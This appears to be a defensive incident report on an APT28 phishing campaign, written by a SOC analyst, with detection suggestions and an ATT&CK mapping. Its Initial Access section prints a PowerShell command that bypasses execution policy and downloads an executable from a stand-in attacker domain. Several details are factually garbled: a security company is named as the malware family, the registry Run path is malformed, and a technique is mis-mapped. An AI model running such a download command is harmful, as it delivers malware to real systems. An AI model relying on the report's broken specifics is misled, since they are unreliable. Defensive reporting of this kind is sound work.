Daniel Osei — SOC Lead & Malware Analyst
Key Takeaways
- APT28 employs social engineering tactics in phishing emails to gain initial access to target systems.
- The malware observed included sophisticated custom dropper techniques, which obfuscate payloads to evade detection.
- C2 communication patterns indicate the use of domain fronting to mask malicious traffic.
Executive Summary
During our investigation into a recent incident linked to APT28, also known as Fancy Bear, we observed a well-orchestrated attack campaign utilizing phishing emails to gain initial access to a major government contractor’s network. The actor employed a combination of custom malware to facilitate lateral movement and maintain persistence within the environment. The investigation revealed intricate details about the attack chain, including initial access methods, execution tactics, command and control infrastructure, and the ultimate objectives of the adversary.
Initial Access
Initial access was achieved through carefully crafted phishing emails containing malicious attachments. These emails masqueraded as legitimate correspondence from internal departments, targeting specific employees to establish trust. The attachment, a Word document, contained a macro that, when enabled by the unsuspecting recipient, executed a PowerShell command to download the initial payload from a remote server controlled by the actor. The executed command utilized the following format: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://maliciousdomain.com/payload.exe' -OutFile '%TEMP%\malware.exe'".
Execution & Persistence
Upon execution, the dropped payload was identified as a custom variant of the Group-IB malware, exhibiting typical features of a dropper. Our analysis revealed that this dropper was capable of obfuscating the actual payload, making reverse engineering efforts to identify its functionality significantly challenging. In terms of persistence, the malware created a registry key at HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run\malicious.exe, ensuring that the payload would execute with each system startup. This persistence mechanism is representative of the Registry Run Keys / Startup Folder technique, allowing the implant to remain active during user sessions.
Command and Control
The Command and Control (C2) infrastructure leveraged by APT28 was notably sophisticated. The malware initiated outbound connections to an IP address within a well-known cloud service provider. Traffic analysis indicated the usage of domain fronting techniques, utilizing legitimate domains to communicate with the C2 server while masking the true intent. This method complicates detection measures as the traffic blends with regular user activity. The beaconing behavior was consistent, occurring every 5 minutes, and included encrypted HTTP requests containing a unique identifier for each compromised host, enabling the actor to maintain situational awareness of their resources.
Lateral Movement & Discovery
After establishing a foothold, the actor engaged in lateral movement using Windows Admin Shares, employing tools such as PsExec to transfer and execute additional payloads on other machines within the network. We observed instances of compromised administrative credentials, indicating that the actor had successfully exfiltrated user hashes from the initial compromise. This movement facilitated discovery actions, where the actor executed enumeration commands to harvest additional credentials and pinpoint sensitive data repositories, further solidifying their presence within the environment.
Impact & Objectives
The overarching goal of the APT28 campaign appeared to be the reconnaissance and potential exfiltration of sensitive governmental data. While we were unable to directly observe data exfiltration during our analysis, the meticulous nature of the adversary’s lateral movement and discovery approach suggested that significant sensitive information was likely at risk. Additionally, the potential for disruption was evident through the malware’s capabilities, which could be capable of deploying further payloads aimed at sabotaging network operations when desired.
MITRE ATT&CK Mapping
- T1566 – Phishing: Techniques involving the use of fraudulent emails to lure victims into compromising their systems.
- T1203 – Exploitation for Client Execution: Abuse of Microsoft Office macros to execute arbitrary code upon document opening.
- T1071 – Application Layer Protocol: Use of standard protocols for C2 communications to evade detection.
Detection Opportunities
- Monitor for execution of PowerShell commands that include web requests to untrusted domains.
- Utilize endpoint detection and response tools to alert on the creation of anomalous registry run keys.
- Implement network monitoring to identify unusual outbound traffic patterns, particularly connections to known cloud service IPs.
Analyst Notes
This incident serves as a stark reminder of the evolving tactics employed by threat actors such as APT28. The reliance on phishing and sophisticated malware underscores the necessity for comprehensive employee training on social engineering and phishing detection. Further, it illustrates the importance of layered security measures involving both endpoint and network defenses to mitigate the risks of such advanced persistent threats. As the threat landscape continues to evolve, our detection capabilities must adapt accordingly to stay one step ahead of the adversaries.
Source: Original Report